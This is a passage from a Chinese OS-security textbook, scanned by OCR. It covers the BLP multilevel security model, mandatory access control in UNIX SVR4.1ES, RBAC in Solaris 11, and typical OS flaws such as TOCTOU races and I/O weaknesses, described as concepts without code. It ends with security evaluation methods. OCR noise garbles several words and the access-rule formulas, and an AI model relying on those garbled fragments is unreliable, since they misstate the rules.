多 级 安全 (又 称 MLS) 是 军事 安全 策略 的 数学 描述 ,是 计算 机 能 实现 的 形式 定义 。 

1) 军事 安全 策略 

计算 机 内 的 所 有 信息 (如 文件 ) 都 具有 相应 的 密级 ,每 个 人 都 拥有 一 个 许可 证 。 军 事 
安全 策略 的 目的 是 防止 用 户 取得 自己 不 应 得 到 的 密级 较 高 的 信息 。 密 级 .安全 属性 .许可 
证 ,访问 类 等 含义 是 一 样 的 ,分 别 对 应 于 主体 或 客体 ,一 般 都 统称 安全 级 。 安 全 级 由 两 方 
面 的 内 容 构 成 。 

(1) 保密 级 别 ( 或 敏感 级 别 ) 。 

(2) 范畴 集 。 

安全 级 包括 一 个 保密 级 别 ,范畴 集 包含 任意 多 个 范畴 。 安 全 级 通常 写作 保密 级 别 后 
随 一 范畴 集 的 形式 。 

实际 上 范畴 集 常常 是 空 的 ,而 且 很 少 有 几 个 范畴 名 。 

在 安全 级 中 保密 级 别 是 线性 排列 的 。 两 个 安全 级 之 间 的 关系 有 以 下 几 种 。 

(1) 第 一 安全 级 支配 第 二 安全 级 。 
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(2) 第 一 安全 级 支配 于 第 二 安全 级 ,或 第 二 安全 级 支配 第 一 安全 级 。 

(3) 第 一 安全 级 等 于 第 二 安全 级 。 

(4) 两 个 安全 级 无 关 。 

2) 多 级 安全 规则 与 BLP 模型 

BLP 模型 的 目标 就 是 详细 说 明 计 算 机 的 多 级 操作 规则 。 对 军事 安全 策略 的 精确 描 
述 被 称 作 是 多 级 安全 策略 。 

BLP 模型 有 两 条 基本 的 规则 。 

(1) 简单 安全 特性 规则 。 一 个 主体 对 客体 进行 读 访 问 的 必要 条 件 是 主体 的 安全 级 支 
配 客 体 的 安全 级 , 即 主 体 的 保密 级 别 不 小 于 客体 的 保密 级 别 , 主 体 的 范畴 集合 包含 客体 的 
全 部 范畴 。 即 主体 只 能 向 下 读 ,不 能 向 上 读 。 

(2) 特性 规则 。 一 个 主体 对 客体 进行 写 访问 的 必要 条 件 是 客体 的 安全 级 支配 主体 的 
安全 级 , 即 客体 的 保密 级 别 不 小 于 主体 的 保密 级 别 , 客 体 的 范畴 集合 包含 主体 的 全 部 范 
畴 。 即 主体 只 能 向 上 写 ,不 能 向 下 写 。 

2. 实现 举例 

以 UNIX SVR 4.1ES 安全 操作 系统 的 强制 访问 控制 机 制 为 例 ,其 强制 访问 控制 机 制 
分 别 对 系统 中 的 主体 和 客体 赋予 了 相应 的 安全 级 ,并 采用 了 BLP 模型 对 应 的 多 级 安全 
规则 。 

1) 安全 级 赋值 

(1) 主体 的 安全 级 。 即 用 户 的 安全 级 以 及 代表 用 户 进行 工作 的 进程 安全 级 。 

用 户 的 安全 级 是 系统 管理 员 根据 安全 策略 ,使 用 adduser 命令 创建 用 户 时 设置 的 。 
系统 在 用 户 安全 文档 中 为 每 个 用 户 建立 一 项 ,表明 该 用 户 的 安全 级 范围 ,并 说 明 其 默认 安 
全 级 ,默认 安全 级 在 该 用 户 的 安全 级 范围 之 内 。 

用 户 登 录 系 统 时 ,可 以 指定 本 次 登录 的 安全 级 ,指定 安全 级 必须 在 其 安全 级 范围 之 
内 。 成 功 登 录 后 ,系统 将 用 户 本 次 指定 的 安全 级 设置 给 为 该 用 户 创 建 的 SHELL 进程 。 
如 果 用 户 不 指定 登录 安全 级 ,系统 则 将 该 用 户 的 默认 安全 级 设置 给 该 用 户 创建 的 
SHELL 进程 。 

(2) 客体 的 安全 级 。 客 体 安 全 级 的 确定 和 赋值 ,是 根据 客体 的 类 型 按 以 下 规则 进 
行 的 。 

。 文件 有 名 管道 的 安全 级 : 文件 ,有 名 管道 的 安全 级 为 创建 该 客体 进程 的 安全 级 ， 
且 客 体 的 安全 级 必须 等 于 其 父 目 录 的 安全 级 ,保存 在 相应 的 磁盘 Inode 结 点 和 内 
存 Inode 结 点 中 。 
进程 消息 队列 \ 信 号 量 集合 和 共享 存储 区 : 这 组 类 型 的 客体 不 具有 文件 系统 表 
示 形 式 , 其 安全 级 为 创建 进程 的 安全 级 ,保存 在 内 存 相 应 的 数据 索引 结构 中 。 
目录 的 安全 级 : 目录 同 普通 文件 一 样 ,在 它们 的 生存 周期 内 具有 一 个 安全 级 ,所 
不 同 的 是 目录 的 结构 需 满足 兼容 性 。 一 个 进程 创建 一 个 目录 ,目录 的 安全 级 即 为 
创建 其 进程 的 安全 级 , 且 目 录 的 安全 级 需 大 于 或 等 于 其 父 目 录 的 安全 级 。 同 文件 
一 样 , 它 保存 在 相应 的 磁盘 Inode 结 点 和 内 存 Inode 结 点 中 。 

(3) 设备 的 安全 级 。 系 统 在 设备 安全 文档 中 说 明和 系统 中 每 个 设备 的 安全 属性 ,如 设 
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备 的 最 高 安全 级 .最 低 安 全 级 等 。 设 备 还 具有 当前 安全 级 ,一 个 设备 的 当前 安全 级 为 调用 
该 设备 的 用 户 进程 .系统 进程 或 系统 服务 进程 的 安全 级 。 设 备 的 当前 安全 级 必须 在 设备 
的 最 大 安全 级 与 最 小 安全 级 之 间 。 

另外 ,设备 分 为 单 级 设备 和 多 级 设备 。 

。 多 级 设备 可 以 包含 多 个 安全 级 数据 。 

。 单 级 设备 在 某 个 时 刻 只 能 处 理 单一 安全 级 的 数据 。 

通常 一 个 用 户 在 登录 时 访问 一 个 终端 设备 ,这 个 用 户 将 以 某 个 安全 级 在 该 终端 上 进 
人 和 人 系统。 如果 这 个 安全 级 不 在 这 个 终端 所 定义 的 安全 级 范围 之 内 ,这 个 登录 就 会 失败 。 
如 果 登 录 成 功 ,这 个 设备 的 安全 级 就 被 设置 成 用 户 登录 时 所 使 用 的 安全 级 。 

要 使 用 磁带 或 软盘 设备 ,或 者 不 是 在 登录 时 访问 终端 设备 ,用 户 必须 要 求 管理 员 分 配 
(allocate) 设 备 ,管理 员 以 某 个 安全 级 将 此 设备 分 配给 这 个 用 户 。 如 果 这 个 安全 级 不 在 设 
备 的 安全 级 范围 之 内 ,这 个 分 配 将 失败 。 如 果 成 功 ,用 户 就 成 为 这 个 设备 的 所 有 者 
(owner)。 文 件 的 DAC 设置 为 600, 设 备 安 全 级 为 分 配 命令 中 给 定 的 安全 级 ,并 且 管 理 员 
将 通知 用 户 这 个 操作 已 经 成 功 。 如 果 用 户 当前 的 安全 级 等 于 分 配 的 安全 级 ,用 户 就 可 以 
使 用 这 些 设备 了 。 

还 有 少量 设备 不 属于 以 上 两 种 分 类 而 需要 特别 处 理 ,包括 /dev/null、/dev/zero、 
/dev/tty。 由 于 数据 并 不 流 过 这 些 设备 ,所 有 用 户 随 时 可 以 访问 这 些 设备 。 

2) 强制 访问 控制 规则 

这 里 分 别 以 CLASS(S)、CLASS(O) 表 示 主 体 与 客体 的 安全 级 ,强制 访问 控制 规 
则 为 : 

。if CLASS(S)>=CLASS(O) then Read(S,O) or Execute(S,0O); 

»° if CLASS(S)=CLASS(O) then Write(S.O) or Append(S,O) 。 

其 中 ,安全 级 由 密级 和 类 别 两 部 分 组 成 。 分 别 以 S.1、S.c 表示 主体 的 密级 和 类 别 ， 
O.1.O.c 表 示 客 体 的 密级 和 类 别 , 授 权 规则 可 表示 如 下 : 

。 当 (S.1 记 =0.D 且 (S.c 包含 0. 中 时 ,主体 可 以 读 (执行 ) 客 体 ; 

。 当 (S.1 二 0.D 且 (S. c==0.c) 时 ,主体 可 以 写 客 体 。 

具体 来 说 就 是 以 下 3 种 情况 。 

(1) 客体 为 文件 .特别 文件 .目录 时 : 

。 车 进程 以 “r”( 或 “x”) 方 式 访问 客体 ,进程 的 安全 级 需 支配 客体 的 安全 级 ; 

。 车 进程 以 “w” 方 式 访问 客体 ,进程 的 安全 级 需 等 于 客体 的 安全 级 。 

(2) 客体 为 进程 时 : 

若 进程 向 另 一 进程 发 送信 号 ,前 者 进程 的 安全 级 需 等 于 后 者 进程 的 安全 级 。 

(3) 客体 为 消息 队列 、 信 号 量 集合 .共享 存储 区 .管道 时 

车 进程 以 “r" 或 “w” 方 式 访问 客体 ,进程 的 安全 级 需 等 于 客体 的 安全 级 。 

3. 使 用 强制 访问 控制 防止 特洛伊 木马 

解决 特洛伊 木马 的 一 个 有 效 方法 是 使 用 强制 访问 控制 机 制 。 例 如 在 多 级 安全 系统 
中 ,特性 规则 能 阻止 正在 机 密 安全 级 上 运行 的 进程 中 的 特洛伊 木马 把 机 密 信息 写 和 人 一 个 
公开 的 文件 里 。 再 如 一 个 公司 对 系统 中 自己 拥有 的 信息 指定 强制 访问 范畴 ,只 有 该 公司 
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的 雇员 才 可 能 进入 这 个 范畴 。 
533 基于 角色 的 访问 控制 


1. 基本 概念 

基于 角色 的 访问 控制 RBAC 的 基本 思想 是 将 访问 许可 权 分 配给 一 定 的 角色 ,用 户 通 
过 饰演 不 同 的 角色 获得 角色 所 拥有 的 访问 许可 权 。RBAC 从 控制 主体 的 角度 出 发 ,根据 
管理 中 相对 稳定 的 职权 和 责任 来 划分 角色 ,将 访问 权限 与 角色 相 联 系 ,这 点 与 传统 的 
MAC 和 DAC 将 权限 直接 授予 用 户 的 方式 不 同 ;通过 给 用 户 分 配合 适 的 角色 ,让 用 户 与 
访问 权限 相 联系 。 角 色 成 为 访问 控制 中 访问 主体 和 受 控 对 象 之 间 的 一 座 桥梁 。 

用 户 即 访问 计算 机 资源 的 主体 。 角 色 即 一 种 岗位 ,代表 一 种 资格 、 权 利和 责任 。 权 限 
即 对 客体 的 操作 权力 。 用 户 分 配 即 将 用 户 与 角色 关联 。 权 限 分 配 即 将 角色 与 权限 关联 。 

角色 可 以 看 作 是 一 组 操作 的 集合 ,不 同 的 角色 具有 不 同 的 操作 集 , 这 些 操 作 集 由 系统 
管理 员 分 配给 角色 。 在 下 面 的 实例 中 ,我 们 假设 Tchl,Tch2,Tch3…Tchi 是 对 应 的 教师 ， 
Studl ,Stud2,Stud3 …Studj 是 相应 的 学 生 ,Mngl,Mng2.Mng3…Mngk 是 教务 处 管理 人 
员 , 那 么 老师 的 权限 为 TchMN= {查询 成 绩 、 上 传 所 教 课 程 的 成 绩 } ;学 生 的 权限 为 Stud 
MN== {查询 成 绩 、 反 映 意 见 ) ;教务 管理 人 员 的 权限 为 MngMN= {查询 ,修改 成 绩 、 打 印 
成 绩 清单 ;。 依 据 RBAC 策略 ,系统 定义 了 各 种 角色 ,每 种 角色 可 以 完成 一 定 的 职能 ,不 
同 的 用 户 根据 其 职能 和 责任 被 赋予 相应 的 角色 ,一旦 某 个 用 户 成 为 某 角 色 的 成 员 , 则 此 用 
户 可 以 完成 该 角色 所 具有 的 职能 。 

系统 管理 员 负 责 授予 用 户 各 种 角色 的 成 员 资 格 或 撤销 某 用 户 具 有 的 某 个 角色 。 例 如 
学 校 新 进 一 名 教师 Tchx, 那 么 系统 管理 员 只 需 将 Tchx 添加 到 教师 这 一 角色 的 成 员 中 即 
可 ,而 无 须 对 访问 控制 列表 做 改动 。 同 一 个 用 户 可 以 是 多 个 角色 的 成 员 , 即 同一 个 用 户 可 
以 扮演 多 种 角色 ,比如 一 个 用 户 可 以 是 老师 ,同时 也 可 以 作为 进修 的 学 生 。 同 样 , 一 个 角 
色 可 以 拥有 多 个 用 户 成 员 , 这 与 现实 是 一 致 的 ,一 个 人 可 以 在 同一 部 门 中 担任 多 种 职务 ， 
而 且 担 任 相 同 职务 的 可 能 不 止 一 人 。 因 此 RBAC 提供 了 一 种 描述 用 户 和 权限 之 间 的 多 
对 多 关系 ,角色 可 以 划分 成 不 同 的 等 级 ,通过 角色 等 级 关系 来 反映 一 个 组 织 的 职权 和 责任 
关系 ,这 种 关系 具有 反 身 性 、 传 递 性 和 非 对 称 性 特点 ,通过 继承 行为 形成 了 一 个 偏 序 关系 ， 
例如 MngMNQTchMN>StudMN。RBAC 中 通常 定义 不 同 的 约束 规则 来 对 模型 中 的 各 
种 关系 进行 限制 ,最 基本 的 约束 是 “相互 排斥 ”约束 和 * 基 本 限制 ?约束 ,分 别 规定 了 模型 中 
的 互 斥 角色 和 一 个 角色 可 被 分 配 的 最 大 用 户 数 。RBAC 中 引进 了 角色 的 概念 ,用 角色 表 
示 访 问 主体 具有 的 职权 和 责任 ,灵活 地 表达 和 实现 了 企业 的 安全 策略 ,使 系统 权限 管理 在 
企业 的 组 织 视图 这 个 较 高 的 抽象 集 上 进行 ,从 而 简化 了 权限 设置 的 管理 ,从 这 个 角度 看 ， 
RBAC 很 好 地 解决 了 企业 管理 信息 系统 中 用 户 数量 多 变动 频繁 的 问题 。 

相 比 较 而 言 ,RBAC 是 实施 面向 企业 安全 策略 的 一 种 有 效 访问 控制 方式 ,允许 组 织 根 
据 用 户 或 角色 的 独特 需要 和 要 求 选择 性 地 向 其 授予 管理 权限 ,从 而 应 用 最 小 特权 安全 原 
则 ,还 具有 灵活 性 、 方 便 性 和 安全 性 的 特点 。 角 色 由 系统 管理 员 定 义 , 角 色 成 员 的 增 减 也 
只 能 由 系统 管理 员 来 执行 , 即 只 有 系统 管理 员 有 权 定 义 和 分 配角 色 。 用 户 与 客体 无 直接 
联系 ,他 只 有 通过 角色 才 享 有 该 角色 所 对 应 的 权限 .从 而 访问 相应 的 客体 。 因 此 用 户 不 能 
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自主 地 将 访问 权限 授 给 别 的 用 户 , 这 是 RBAC 与 DAC 的 根本 区 别 所 在 。RBAC 与 MAC 
的 区 别 在 于 : MAC 是 基于 多 级 安全 需求 的 ,而 RBAC 则 不 是 。 

2. 实现 举例 

Oracle Solaris 11 的 RBAC 功能 控制 用 户 对 通常 限于 Root 角色 的 任务 的 访问 。 通 
过 对 进程 和 用 户 应 用 安全 属性 ,RBAC 可 以 在 多 个 管理 员 之 间 分 布 管 理 权 限 。RBAC 组 
件 包括 角色 、 权 限 配 置 文件 和 授权 。 进 程 权 限 管 理 通过 特权 实现 。 与 通过 超级 用 户 管理 
系统 相 比 ,将 特权 与 RBAC 结合 使 用 是 一 种 更 为 安全 的 管理 方法 。 权 限 分 配 如 图 5-6 
所 示 。 


图 5-6 RBAC 的 权限 分 配 


Solaris 系统 中 的 RBAC 模型 引入 了 以 下 元 素 : 

(1) 授权 : 一 种 权限 ,允许 用 户 或 角色 执行 某 一 类 需要 额外 权限 才能 执行 的 操作 。 
例如 ,安装 过 程 中 的 安全 策略 会 为 一 般 用 户 提供 solaris. device. cdrw 授权 。 用 户 可 使 用 
此 授权 来 读 取 和 写 和 人 CD-ROM 设备 。 详 细 列 表 可 参见 /etc/security/auth_attr 文件 。 

(2) 特权 : 可 以 授予 命令 、 用 户 、 角 色 或 系统 的 独立 权限 。 特 权 可 以 保证 进程 成 功 执 
行 。 例 如 ,proc_exec 特权 允许 进程 调用 execve()。 一 般 用 户 具有 基本 特权 。 要 查看 你 的 
基本 特权 ,可 以 执行 ppriv -vl basic 命令 。 

(3) 安全 属性 : 允许 进程 执行 某 个 操作 的 属性 。 在 典型 的 UNIX 环境 中 ,安全 属性 
允许 进程 执行 原本 禁止 一 般 用 户 执 行 的 操作 。 例 如 ,setuid 和 setgid 程序 具有 安全 属性 。 
在 RBAC 模型 中 ,授权 和 特权 是 除 setuid 和 setgid 程序 之 外 的 安全 属性 。 可 以 将 这 些 属 
性 指定 给 某 个 用 户 。 例 如 ,具有 solaris. device. allocate 授权 的 用 户 可 以 分 配 设备 供 独 占 
使 用 。 特 权 可 以 置 于 某 个 进程 上 。 例 如 ,具有 file_flag_set 特权 的 进程 可 以 设置 不 变 的 、 
未 解除 链接 的 或 仅 附 加 的 文件 属性 。 

(4) 特权 应 用 程序 : 可 以 通过 检查 安全 属性 来 覆盖 系统 控制 的 应 用 程序 或 命令 。 在 
典型 的 UNIX 环境 和 RBAC 模型 中 ,使 用 setuid 和 setgid 的 程序 都 是 特权 应 用 程序 。 在 
RBAC 模型 中 ,需要 有 特权 或 授权 才能 成 功 执行 的 程序 也 是 特权 应 用 程序 。 

(5) 权限 配置 文件 : 可 以 指定 给 角色 或 用 户 的 安全 属性 的 集合 。 一 个 权限 配置 文件 
可 以 包含 授权 、 直 接 指定 的 特权 、 具 有 安全 属性 的 命令 以 及 其 他 权限 配置 文件 。 其 他 配置 
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文件 中 的 配置 文件 称 为 补充 权限 配置 文件 。 权 限 配置 文件 提供 了 一 种 便捷 的 安全 属性 分 
组 方法 。 

(6) 角色 : 用 于 运行 特权 应 用 程序 的 特殊 身份 。 这 种 特殊 身份 只 能 由 指定 的 用 户 承 
担 。 在 由 角色 (包括 root 角色 ) 运 行 的 系统 中 ,超级 用 户 是 不 必要 的 。 超 级 用 户 功 能 会 分 
配给 不 同 的 角色 。 例 如 ,在 有 两 种 角色 的 系统 中 ,将 由 其 中 的 安全 角色 处 理 安全 任务 ,而 
另 一 个 角色 负责 处 理 与 安全 无 关 的 系统 管理 任务 。 角 色 可 以 进行 更 细 粒 度 的 划分 。 例 
如 ,系统 可 以 包括 各 种 独立 的 管理 角色 ,分 别 用 于 处 理 加 密 框架 、 打 印 机 、 系 统 时 间 、 文 件 
系统 和 审计 。 

图 5-7 使 用 网 络 安全 (Network Security) 角 色 和 网 络 安全 (Network Security) 权 限 配 
置 文件 说 明 RBAC 关系 。 


一 | jdoe 
局 授权 
角色 
一 | 一 二 网 络 安全 一 | solaris.smf.manage.ssh 
solaris.smf.value.tnd 
solaris.network.* 
4 具有 安全 属性 的 命令 
网 络 安全 Eo | /usr/bin/ssh-keygen:uid=0;gid=sys 


/usr/sbin/ksslcfg:euld=0 


补充 权限 配置 文件 


网络 Wi-Fi 安 全 
网 络 链接 安全 
网 络 IPSec 管 理 


图 5-7 RBAC 元 素 关 系 示 例 


网 络 安全 角色 用 于 管理 IPSec、Wi-Fi 和 网 络 链接 。 该 角色 指定 给 用 户 jdoe。jdoe 可 
以 通过 切换 到 该 角色 然后 提供 角色 口令 来 承担 该 角色 。 管 理 员 可 以 定制 角色 以 接受 用 户 
口令 ,而 不 是 角色 口令 。 

在 图 5-7 中 ,网 络 安全 权限 配置 文件 指定 给 网 络 安全 角色 。 网 络 安全 权限 配置 文件 
包含 一 些 按 顺 序 评估 的 补充 配置 文件 : 网 络 Wi-Fi 安全 (Network Wifi Security)、 网 络 链 
接 安 全 (Network Link Security) 和 网 络 IPSec 管理 (Network IPSec Management) 。 这 些 
补充 配置 文件 用 于 角色 的 主要 任务 。 

网 络 安全 权限 配置 文件 有 三 个 直接 指定 的 授权 ,没有 直接 指定 的 特权 :还 有 两 个 具有 
安全 属性 的 命令 。 补 充 权限 配置 文件 有 直接 指定 的 授权 ,其 中 两 个 包含 具有 安全 属性 的 
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命令 。 在 网 络 安 全 角色 中 ,jdoe 拥有 这 些 配 置 文件 中 的 所 有 指定 授权 ,并 可 执行 这 些 配 置 
文件 中 所 有 具有 安全 属性 的 命令 。jdoe 可 以 管理 网 络 安全 。 
有 关 RBAC 授权 权限 配置 文件 等 限于 篇 幅 不 再 袭 述 。 可 参见 Oracle Solaris 11 


Information Library。 


5.4 安全 操作 系统 评测 


541 操作 系统 的 典型 缺陷 


在 操作 系统 安全 特性 的 分 析 中 ,常常 用 到 “利用 漏洞 ”这 一 术语 。 这 些 年 来 ,在 很 多 操 
作 系 统 中 都 发 现 了 漏洞 。 但 是 ,这 些 漏洞 逐渐 得 到 了 修补 ,而 且 对 可 能 出 现 薄弱 点 的 部 位 
的 知识 体系 也 扩大 了 。 

1. 已 知 的 漏洞 

本 小 节 将 讨论 操作 系统 中 已 经 发 现 的 典型 漏洞 。 讨 论 的 目的 不 是 为 操作 系统 的 潜在 
入 侵 者 提供 一 个 “如 何 做 ”的 指南 ,而 是 为 了 说 明 有 必要 在 操作 系统 的 设计 和 测试 中 进行 
仔细 分 析 。 

由 于 以 下 几 个 原因 ,1/O 处 理 是 操作 系统 最 大 的 薄弱 点 : 

(1) W/O 是 通过 独立 的 ,智能 硬件 子 系统 来 完成 的 (智能 设备 能 够 自主 操作 ,例如 重 
排 磁盘 请 求 队列 以 优化 磁头 的 运动 ,或 者 异步 执行 一 系列 1/O 操作 )。 这 些 自主 部 件 常 
常 位 于 操作 系统 的 安全 内 核 和 安全 限制 之 外 。 

(2) 执行 I/O 的 代码 比 计算 系统 其 他 部 件 的 代码 复杂 得 多 ,并 且 更 依赖 于 特定 的 硬 
件 设备 。 由 于 这 些 原 因 , 检 查 1/O 设备 驱动 程序 .访问 代码 ,以 及 服务 程序 的 正确 性 就 比 
较 困 难 ,更 不 用 说 形式 化 验证 它们 。 

(3) 为 了 快速 地 传递 数据 ,1/O 活动 有 时 会 绕 过 操作 系统 的 其 他 功能 ,如 页 面 地 址 和 
段 地 址 的 转换 。 因 此 , 它 有 可 能 避 开 与 这 些 功能 相关 的 保护 特性 。 

(4) I/O 操作 通常 是 面向 字符 的 。 同 样 , 为 了 能 够 快速 传递 数据 ,操作 系统 设计 者 在 
数据 传输 期 间 限制 系统 执行 的 指令 数目 。 有 时 被 省 略 的 指令 正 是 在 传输 字符 的 过 程 中 实 
施 安全 策略 的 指令 。 

操作 系统 安全 方面 的 第 (2) 个 突出 弱点 是 访问 策略 的 二 义 性 。 一 方面 .对 各 用 户 进 行 
分 离 ,保护 他 们 各 自 的 资源 ; 另 一 方面 ,用 户 需要 共享 库 文件 .实用 程序 公共 数据 以 及 系 
统 表格 。 在 策略 上 ,隔离 和 共享 之 间 的 区 别 并 不 总 是 很 明确 。 因 此 ,在 实现 的 过 程 中 ,也 
不 能 够 严格 区 分 。 

第 (3) 个 潜在 的 问题 是 不 完全 检查 。Saltzer 推荐 的 一 个 操作 系统 设计 ,其 中 每 一 次 
的 访问 请 求 都 要 经 过 权限 检查 。 然 而 , 某 些 系统 对 每 次 1/O 操作 、 进 程 执行 .机 器 周期 间 
隔 只 做 一 次 访问 权限 检查 。 这 种 机 制 可 用 来 实现 完全 保护 ,但 关于 何 时 调用 该 机 制 的 决 
策 并 不 完善 。 因 此 ,在 没有 明确 要 求 的 情况 下 ,系统 设计 者 采用 了 “最 有 效 ” 机 制 ,即使 用 
最 少 的 机 器 资源 。 

通用 性 是 第 (4) 个 弱点 ,特别 是 在 大 型 计算 系统 的 商业 性 操作 系统 中 。 操 作 系 统 实现 
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者 允许 用 户 自 定义 操作 系统 的 安装 ,并 且 允 许 安装 其 他 公司 编写 的 软件 包 。 作 为 操作 系 
统 的 一 部 分 ,一 些 软件 包 必须 拥有 和 操作 系统 一 样 的 访问 特权 才能 被 执行 。 例 如 ,和 现 有 
的 操作 系统 的 标准 控制 相 比 ,有 的 程序 提供 更 加 严格 的 访问 控制 。 通 过 “ 钓 "(Hook) 来 安 
装 软件 包 , 然 而 ,这 些 “ 钩 ”也 成 为 任何 想 要 入 侵 操 作 系 统 的 用 户 的 陷 门 。 

2. 漏洞 利用 的 例子 

如 上 所 述 ,用 户 接口 是 许多 主流 操作 系统 的 薄弱 点 。 利 用 漏洞 进行 攻击 的 第 一 个 例 
子 就 涉及 用 户 接口 。 某 些 操作 系统 只 在 用 户 操作 开始 时 进行 访问 权限 检查 ,这 就 导致 了 
典型 的 检查 时 刻 到 使 用 时 刻 的 缺陷 。 对 每 一 个 要 传输 的 字符 都 进行 权限 检查 会 增加 系统 
的 开销 。 命 令 通 常 驻 留 在 用 户 内 存 中 。 在 操作 正式 开始 之 后 ,任何 用 户 都 可 以 修改 该 命 
令 的 源 地 址 或 目标 地 址 。 因 为 访问 权限 已 被 检查 ,所 以 即使 使 用 新 的 地 址 ,都 不 再 对 数据 
传输 进行 检查 。 利 用 这 一 缺陷 ,用 户 能 向 他 们 和 希望 的 任何 地 址 传送 或 接收 数据 。 

利用 漏洞 进行 攻击 的 另 一 个 例子 涉及 程序 上 的 丝 漏 。 某 些 操作 系统 为 一 些 安全 性 软 
件 包 的 安装 保留 了 一 种 特殊 的 管理 功能 。 执 行 安装 时 ,这 个 管理 调用 以 特权 方式 将 控制 
权 返 回 给 用 户 。 由 于 在 这 种 方式 下 所 允许 的 操作 并 不 受到 严格 的 监控 ,因此 ,管理 调用 可 
以 用 于 访问 控制 或 者 用 于 其 他 高 安全 性 的 系统 访问 。 尽 管 要 执行 这 种 特殊 的 管理 调用 需 
要 一 些 努 力 ,但 在 操作 系统 中 ,这 种 调用 是 完全 可 以 得 到 的 。 因 此 ,还 应 该 使 用 附加 的 检 
查 来 认证 执行 管理 请 求 的 程序 。 一 种 替代 办 法 是 : 在 管理 请 求 下 进入 的 任何 主体 的 访问 
权限 , 仅 局 限于 那些 用 于 执行 附加 程序 功能 的 对 象 。 

检查 时 刻 到 使 用 时 刻 的 不 匹配 也 会 引发 安全 问题 。 在 基于 此 漏洞 进行 攻击 的 过 程 
中 ,一 个 用 户 访问 一 个 对 象 ,如 缓存 ,要 经 过 访问 权限 检查 。 但 是 在 访问 得 到 批准 到 访问 
正式 开始 之 间 的 这 段 时 间 ,用 户 可 以 改变 对 象 的 指定 ,因此 ,用 户 没有 访问 应 该 访问 的 对 
象 ,而 是 访问 一 个 不 该 访问 的 对 象 。 

当然 ,还 有 其 他 利用 多 种 漏洞 的 更 复杂 组 合 的 入 侵 。 然 而 ,总 的 来 说 ,安全 操作 系统 
的 安全 缺陷 是 由 于 复杂 情形 (例如 用 户 接 口 ) 的 错误 分 析 造成 的 ,或 者 是 由 于 安全 策略 中 
的 二 义 性 或 疏忽 造成 的 。 利 用 简单 的 安全 机 制 实现 清楚 而 完善 的 安全 策略 ,入 侵 的 数量 
就 会 显著 减少 。 


542 评测 方法 与 评估 准则 


1. 评测 方法 

一 个 操作 系统 是 安全 的 ,是 指 它 满足 某 一 给 定 的 安全 策略 。 一 个 操作 系统 的 安全 性 
是 与 设计 密切 相关 的 ,只 有 有 效 保证 从 设计 者 到 用 户 都 相信 设计 准确 地 表达 了 模型 ,而 代 
码 准 确 地 表达 了 设计 时 ,该 操作 系统 才 可 以 说 是 安全 的 ,这 也 是 安全 操作 系统 评测 的 主要 
内 容 。 评 测 操作 系统 安全 性 的 方法 主要 有 三 种 : 形式 化 验证 、 非 形式 化 确认 及 入 侵 分 析 。 
这 些 方法 各 自 可 以 独立 使 用 ,也 可 以 将 它们 综合 起 来 评估 操作 系统 的 安全 性 。 

(1) 形式 化 验证 。 分 析 操 作 系统 安全 性 最 精确 的 方法 是 形式 化 验证 。 在 形式 化 验证 
中 ,安全 操作 系统 被 简化 为 一 个 要 证 明 的 “定理 ”。 定 理 断言 该 安全 操作 系统 是 正确 的 , 即 
它 提供 了 所 应 提供 的 安全 特性 。 但 是 证 明 整 个 安全 操作 系统 正确 性 的 工作 量 是 巨大 的 。 
另外 形式 化 验证 也 是 一 个 复杂 的 过 程 , 对 于 某 些 大 的 实用 系统 ,试图 描述 及 验证 它 都 是 十 
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分 困难 的 ,特别 是 那些 在 设计 时 并 未 考虑 形式 化 验证 的 系统 更 是 如 此 。 

(2) 非 形式 化 确认 。 确 认 是 比 验证 更 为 普遍 的 术语 。 它 包括 验证 ,但 它 也 包括 其 他 
一 些 不 太 严格 的 让 人 们 相信 程序 正确 性 的 方法 。 完 成 一 个 安全 操作 系统 的 确认 有 如 下 几 
种 不 同 的 方法 。 

QO 安全 需求 检查 : 通过 源 代码 或 系统 运行 时 所 表现 的 安全 功能 ,交叉 检查 操作 系统 
的 每 个 安全 需求 。 其 目标 是 认证 系统 所 做 的 每 件 事 是 否 都 在 功能 需求 表 中 列 出 ,这 一 过 
程 有 助 于 说 明 系 统 仅 做 了 它 应 该 做 的 每 件 事 。 但 是 这 一 过 程 并 不 能 保证 系统 没有 做 它 不 
应 该 做 的 事情 。 

@ 设计 及 代码 检查 : 设计 者 及 程序 员 在 系统 开发 时 通过 仔细 检查 系统 设计 或 代码 ， 
试图 发 现 设计 或 编程 错误 。 例 如 ,不 正确 的 假设 ,不一致 的 动作 或 错误 的 逻辑 等 。 这 种 检 
查 的 有 效 性 依赖 于 检查 的 严格 程度 。 

G) 模块 及 系统 测试 : 在 程序 开发 期 间 ,程序 员 或 独立 测试 小 组 挑选 数据 检查 操作 系 
统 的 安全 性 。 必 须 组 织 测试 数据 以 便 检查 每 条 运行 路 线 、 每 个 条 件 语句 .所 产生 的 每 种 类 
型 的 报表 、 每 个 变量 的 更 改 等 。 在 这 个 测试 过 程 中 要 求 以 一 种 有 条 不 率 的 方式 检查 所 有 
的 实体 。 

(3) “老虎 ?小 组 入 侵 测试 。 在 这 种 方法 中 ,老虎 ?小 组 成 员 试 图 * 挫 毁 ? 正 在 测试 中 
的 安全 操作 系统 “老虎 ?小 组 成 员 应 当 掌 握 操作 系统 典型 的 安全 漏洞 ,并 试图 发 现 并 利 
用 系统 中 的 这 些 安全 缺陷 。 

这 种 方法 很 像 要 求 一 个 机 修 工 对 大 量 上 市 的 汽车 进行 检查 的 情形 。 机 修 工 知道 可 能 
的 缺陷 所 在 ,并 尽 可 能 地 多 次 检查 。 操 作 系 统 在 某 一 次 入 侵 测试 中 失效 , 则 说 明 它 内 部 有 
错 。 相 反 地 ,操作 系统 在 某 一 次 入 侵 测 试 中 不 失效 ,并 不 能 保证 系统 中 没有 任何 错误 。 入 
侵 测试 在 确定 错误 存在 方面 是 非常 有 用 的 。 

一 般 来 说 ,评价 一 个 计算 机 系统 安全 性 能 的 高 低 ,应 从 如 下 两 个 方面 进行 : 

@ 安全 功能 : 系统 具有 哪些 安全 功能 。 

@ 可 信和 性 : 安全 功能 在 系统 中 得 以 实现 的 ,可 被 信任 的 程度 。 通 常 通过 文档 规范 、 
系统 测试 .形式 化 验证 等 安全 保证 来 说 明 。 

2. 评估 准则 

1) 评估 准则 概况 

为 了 对 现 有 计算 机 系统 的 安全 性 进行 统一 的 评价 ,为 计算 机 系统 制造 商 提供 一 个 有 
权威 的 系统 安全 性 标准 ,需要 有 一 个 计算 机 系统 安全 评测 准则 。 

